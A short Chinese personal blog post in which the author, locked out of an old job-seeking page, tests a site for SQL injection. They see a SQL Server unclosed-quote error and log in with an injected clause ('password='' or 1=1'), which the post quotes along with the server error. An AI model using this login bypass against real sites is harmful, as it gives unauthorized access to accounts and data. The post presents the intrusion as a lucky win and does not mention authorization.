搜索自己的姓名,居然能找到在学生时代发布的求职页,注册密码忘了,想删除它,联系管理员没音讯。
测试一下sql注入
Microsoft OLE DB Provider
for
SQL Server 错误
'
80040e14
'
字符串 '' 之前有未闭合的引号。
字符串 '' 之前有未闭合的引号。
天助我也!
猜测SQL并注入语句,
where
userid='zzf' and(''='' and password='' or 1=1) and ''=''
登陆成功,
您好,来自59.40.219.46的zzf...
OK~
居然有如此好运,唉~